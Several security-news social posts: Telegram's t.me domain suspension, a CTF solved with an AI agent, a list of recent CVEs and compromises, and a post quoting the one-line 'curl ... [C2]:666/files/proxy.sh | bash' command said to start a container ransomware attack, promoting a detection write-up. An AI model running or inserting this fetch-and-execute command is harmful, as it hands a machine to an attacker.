โผ๏ธ Telegram's t[.]me domain is down with WHOIS now showing a "serverHold" status which is a registry-level suspension that stops the domain from resolving entirely.
All t[.]me links are currently broken. The app itself still works, but link sharing is toast until this gets lifted. ๐คฃ
@RedHatPentester so, I tried hiveair crf yesterday, but I tried using an agent to complete the ctf,
I know it is meant to be done manually but zi went the agentic way.....I'm glad to report we successfully completed this in <2 mins
I then went through everything manually๐ฅ
Security things from the last few days:
- CopyFail (linux pwn'd)
- CopyFail 2/Dirty Frag
- 13 advisories in Next.js
- Over 70 CVEs addressed in MacOS 26.5
- ~50 CVEs addressed in iOS 26.5
- YellowKey (Windows Bitlocker pwn'd entirely)
- GreenPlasma (Windows privilege escalation)
- CVE-2026-21510 and CVE-2026-21513 confirmed to be used by Russia for Windows RCE
- CVE-2026-32202 separately confirmed to be used by Russia for sensitive document access
- Mini-Shai Hulud (over 300 JS and Python packages compromised via GitHub Action cache poisoning)
- Google confirms they have identified AI-powered exploitation of zero days in an unidentified "open-source, web-based system administration too"
- Canvas (popular LMS used in most schools) pwn'd entirely
- PAN-OS (palo alto networks) pwn'd with a 9.3 severity CVE-2026-0300
Are you scared yet?
My substacks will also include custom skills for your agents. Again, these substacks will be what I have done so far with agentic ai and workflows both on the job and in labs. Things can differ.
One command. No file written to disk. Full code execution inside a container.
curl -fsSL [C2]:666/files/proxy. sh | bash
This is how TeamPCP's container ransomware operation starts.
Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.